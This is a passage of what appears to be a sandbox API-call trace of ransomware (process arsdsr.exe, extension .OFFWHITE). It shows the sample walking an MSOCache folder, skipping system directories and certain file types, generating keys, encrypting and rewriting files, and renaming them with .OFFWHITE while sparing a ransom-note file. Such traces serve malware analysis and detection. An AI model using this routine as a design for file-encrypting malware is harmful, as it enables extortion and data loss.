ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0084.449] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0084.449] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0084.449] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0084.449] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0084.449] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f356eb0, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f356eb0, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1861, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0084.449] lstrcmpiW (lpString1="Setup.xml", lpString2=".") returned 1 [0084.449] lstrcmpiW (lpString1="Setup.xml", lpString2="..") returned 1 [0084.449] lstrcmpiW (lpString1="Setup.xml", lpString2="...") returned 1 [0084.449] lstrcmpiW (lpString1="Setup.xml", lpString2="windows") returned -1 [0084.449] lstrcmpiW (lpString1="Setup.xml", lpString2="$recycle.bin") returned 1 [0084.449] lstrcmpiW (lpString1="Setup.xml", lpString2="rsa") returned 1 [0084.449] lstrcmpiW (lpString1="Setup.xml", lpString2="ntuser.dat") returned 1 [0084.449] lstrcmpiW (lpString1="Setup.xml", lpString2="programdata") returned 1 [0084.449] lstrcmpiW (lpString1="Setup.xml", lpString2="appdata") returned 1 [0084.449] lstrcmpiW (lpString1="Setup.xml", lpString2="program files") returned 1 [0084.449] lstrcmpiW (lpString1="Setup.xml", lpString2="program files (x86)") returned 1 [0084.449] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\" [0084.449] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\", lpString2="Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" [0084.449] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.449] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.449] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0084.449] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0084.450] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0084.450] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0084.450] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0084.450] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0084.450] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0084.450] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0084.450] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0084.450] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0084.450] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0084.450] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0084.450] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0084.450] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0084.450] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0084.450] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0084.450] lstrcmpiW (lpString1="Setup.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0084.450] GetProcessHeap () returned 0x500000 [0084.450] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547bc8 [0084.450] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0084.452] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=6241) returned 1 [0084.452] GetProcessHeap () returned 0x500000 [0084.452] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0084.452] GetProcessHeap () returned 0x500000 [0084.452] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0084.452] GetProcessHeap () returned 0x500000 [0084.452] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0084.452] GetProcessHeap () returned 0x500000 [0084.452] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0084.452] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.452] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.452] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0084.452] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.452] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.452] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0084.452] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.452] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.452] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e310*=0x100) returned 1 [0084.453] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.453] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.453] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0084.453] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1861, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.453] SetLastError (dwErrCode=0x0) [0084.453] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0084.541] GetLastError () returned 0x0 [0084.541] GetLastError () returned 0x0 [0084.541] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1961, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.541] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0084.541] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1a61, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.541] WriteFile (in: hFile=0x21c, lpBuffer=0x547bc8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547bc8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0084.541] GetProcessHeap () returned 0x500000 [0084.541] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1861) returned 0x5537b0 [0084.541] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.542] ReadFile (in: hFile=0x21c, lpBuffer=0x5537b0, nNumberOfBytesToRead=0x1861, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5537b0*, lpNumberOfBytesRead=0x295e540*=0x1861, lpOverlapped=0x0) returned 1 [0084.560] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.560] WriteFile (in: hFile=0x21c, lpBuffer=0x5537b0*, nNumberOfBytesToWrite=0x1861, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5537b0*, lpNumberOfBytesWritten=0x295e54c*=0x1861, lpOverlapped=0x0) returned 1 [0084.560] GetProcessHeap () returned 0x500000 [0084.560] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5537b0 | out: hHeap=0x500000) returned 1 [0084.560] CloseHandle (hObject=0x21c) returned 1 [0084.564] GetProcessHeap () returned 0x500000 [0084.564] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0084.564] GetProcessHeap () returned 0x500000 [0084.564] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0084.564] GetProcessHeap () returned 0x500000 [0084.564] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0084.564] GetProcessHeap () returned 0x500000 [0084.564] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0084.564] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" [0084.564] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" [0084.564] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.offwhite")) returned 1 [0084.567] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fb9f9e0, ftCreationTime.dwHighDateTime=0x1cbe575, ftLastAccessTime.dwLowDateTime=0x7fb9f9e0, ftLastAccessTime.dwHighDateTime=0x1cbe575, ftLastWriteTime.dwLowDateTime=0x437179c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x30780dd, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="VisioLR.cab", cAlternateFileName="")) returned 1 [0084.567] lstrcmpiW (lpString1="VisioLR.cab", lpString2=".") returned 1 [0084.567] lstrcmpiW (lpString1="VisioLR.cab", lpString2="..") returned 1 [0084.568] lstrcmpiW (lpString1="VisioLR.cab", lpString2="...") returned 1 [0084.568] lstrcmpiW (lpString1="VisioLR.cab", lpString2="windows") returned -1 [0084.568] lstrcmpiW (lpString1="VisioLR.cab", lpString2="$recycle.bin") returned 1 [0084.568] lstrcmpiW (lpString1="VisioLR.cab", lpString2="rsa") returned 1 [0084.568] lstrcmpiW (lpString1="VisioLR.cab", lpString2="ntuser.dat") returned 1 [0084.568] lstrcmpiW (lpString1="VisioLR.cab", lpString2="programdata") returned 1 [0084.568] lstrcmpiW (lpString1="VisioLR.cab", lpString2="appdata") returned 1 [0084.568] lstrcmpiW (lpString1="VisioLR.cab", lpString2="program files") returned 1 [0084.568] lstrcmpiW (lpString1="VisioLR.cab", lpString2="program files (x86)") returned 1 [0084.568] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\" [0084.568] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\", lpString2="VisioLR.cab" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" [0084.568] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.568] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.568] PathFindExtensionW (pszPath="VisioLR.cab") returned=".cab" [0084.568] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0084.568] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0084.568] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0084.568] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x272b1e70, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x272b1e70, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x435c1d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2ab000, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="VisioMUI.msi", cAlternateFileName="")) returned 1 [0084.568] lstrcmpiW (lpString1="VisioMUI.msi", lpString2=".") returned 1 [0084.568] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="..") returned 1 [0084.568] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="...") returned 1 [0084.568] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="windows") returned -1 [0084.568] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="$recycle.bin") returned 1 [0084.568] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="rsa") returned 1 [0084.568] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="ntuser.dat") returned 1 [0084.568] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="programdata") returned 1 [0084.569] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="appdata") returned 1 [0084.569] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="program files") returned 1 [0084.569] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="program files (x86)") returned 1 [0084.569] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\" [0084.569] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\", lpString2="VisioMUI.msi" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" [0084.569] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.569] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.569] PathFindExtensionW (pszPath="VisioMUI.msi") returned=".msi" [0084.569] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0084.569] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0084.569] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0084.569] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0084.569] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0084.569] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0084.569] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0084.569] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0084.569] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0084.569] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0084.569] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0084.569] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0084.569] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0084.569] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0084.569] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0084.569] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f0a8e20, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f0a8e20, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="VisioMUI.xml", cAlternateFileName="")) returned 1 [0084.569] lstrcmpiW (lpString1="VisioMUI.xml", lpString2=".") returned 1 [0084.569] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="..") returned 1 [0084.569] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="...") returned 1 [0084.570] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="windows") returned -1 [0084.570] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="$recycle.bin") returned 1 [0084.570] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="rsa") returned 1 [0084.570] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="ntuser.dat") returned 1 [0084.570] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="programdata") returned 1 [0084.570] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="appdata") returned 1 [0084.570] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="program files") returned 1 [0084.570] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="program files (x86)") returned 1 [0084.570] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\" [0084.570] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\", lpString2="VisioMUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" [0084.570] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.570] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.570] PathFindExtensionW (pszPath="VisioMUI.xml") returned=".xml" [0084.570] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0084.570] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0084.570] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0084.570] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0084.570] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0084.570] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0084.570] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0084.570] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0084.570] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0084.570] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0084.570] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0084.570] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0084.570] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0084.570] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0084.571] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0084.571] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0084.571] GetProcessHeap () returned 0x500000 [0084.571] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547bd8 [0084.571] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0084.571] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=9503) returned 1 [0084.571] GetProcessHeap () returned 0x500000 [0084.571] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0084.571] GetProcessHeap () returned 0x500000 [0084.571] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0084.571] GetProcessHeap () returned 0x500000 [0084.571] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0084.571] GetProcessHeap () returned 0x500000 [0084.571] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0084.571] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.571] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.571] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0084.571] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.571] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.572] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0084.572] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.572] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.572] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e310*=0x100) returned 1 [0084.572] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.572] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.572] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0084.572] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x251f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.572] SetLastError (dwErrCode=0x0) [0084.572] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0084.576] GetLastError () returned 0x0 [0084.576] GetLastError () returned 0x0 [0084.576] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x261f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.576] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0084.577] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x271f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.577] WriteFile (in: hFile=0x21c, lpBuffer=0x547bd8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547bd8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0084.577] GetProcessHeap () returned 0x500000 [0084.577] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x251f) returned 0x5537b0 [0084.577] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.577] ReadFile (in: hFile=0x21c, lpBuffer=0x5537b0, nNumberOfBytesToRead=0x251f, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5537b0*, lpNumberOfBytesRead=0x295e540*=0x251f, lpOverlapped=0x0) returned 1 [0084.630] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.630] WriteFile (in: hFile=0x21c, lpBuffer=0x5537b0*, nNumberOfBytesToWrite=0x251f, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5537b0*, lpNumberOfBytesWritten=0x295e54c*=0x251f, lpOverlapped=0x0) returned 1 [0084.631] GetProcessHeap () returned 0x500000 [0084.631] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5537b0 | out: hHeap=0x500000) returned 1 [0084.631] CloseHandle (hObject=0x21c) returned 1 [0084.632] GetProcessHeap () returned 0x500000 [0084.632] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0084.632] GetProcessHeap () returned 0x500000 [0084.632] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0084.632] GetProcessHeap () returned 0x500000 [0084.632] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0084.632] GetProcessHeap () returned 0x500000 [0084.632] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0084.632] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" | out: lpString1="C:/MSOCache\\All 